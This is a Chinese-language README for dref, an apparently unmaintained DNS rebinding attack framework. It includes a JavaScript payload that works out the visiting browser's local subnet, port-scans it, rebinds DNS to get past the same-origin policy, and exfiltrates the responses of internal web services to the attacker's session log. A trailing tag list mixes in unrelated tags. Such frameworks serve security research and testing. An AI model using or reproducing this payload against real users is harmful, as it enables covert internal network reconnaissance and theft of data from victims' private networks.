ReversecLabs/dref

DNS Rebinding 攻击框架

本项目已不再维护。 dref 承担了 [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) 的繁重工作。以下代码片段取自其[内置 payload](https://github.com/mwrlabs/dref/wiki/Payloads#web-discover)，展示了使用该框架从被挂马的浏览器扫描本地子网的过程；在识别出活跃的 Web 服务后，它会继续外发 GET 响应，[轻松绕过同源策略](https://github.com/mwrlabs/dref/wiki#limitations)： ``` // mainFrame() runs first async function mainFrame () { // We use some tricks to derive the browser's local /24 subnet const localSubnet = await network.getLocalSubnet(24) // We use some more tricks to scan a couple of ports across the subnet netmap.tcpScan(localSubnet, [80, 8080]).then(results => { // We launch the rebind attack on live targets for (let h of results.hosts) { for (let p of h.ports) { if (p.open) session.createRebindFrame(h.host, p.port) } } }) } // rebindFrame() will have target ip:port as origin function rebindFrame () { // After this we'll have bypassed the Same-Origin policy session.triggerRebind().then(() => { // We can now read the response across origin... network.get(session.baseURL, { successCb: (code, headers, body) => { // ... and exfiltrate it session.log({code: code, headers: headers, body: body}) } }) }) } ```

请前往 [Wiki](https://github.com/mwrlabs/dref/wiki) 了解入门信息，或查看 [dref 攻击无头浏览器](https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/) 获取实际用例。

_{这是一个开发版本 - 请勿在生产环境中使用}

标签：CMS安全, DNS重绑定, HTTP请求走私防范失效, IP 地址批量处理, JavaScript, SOP绕过, Web安全, 内网探测, 同源策略绕过, 子网扫描, 插件系统, 数据可视化, 数据渗出, 数据统计, 端口扫描, 网络安全, 自定义脚本, 蓝队分析, 逆向工具, 隐私保护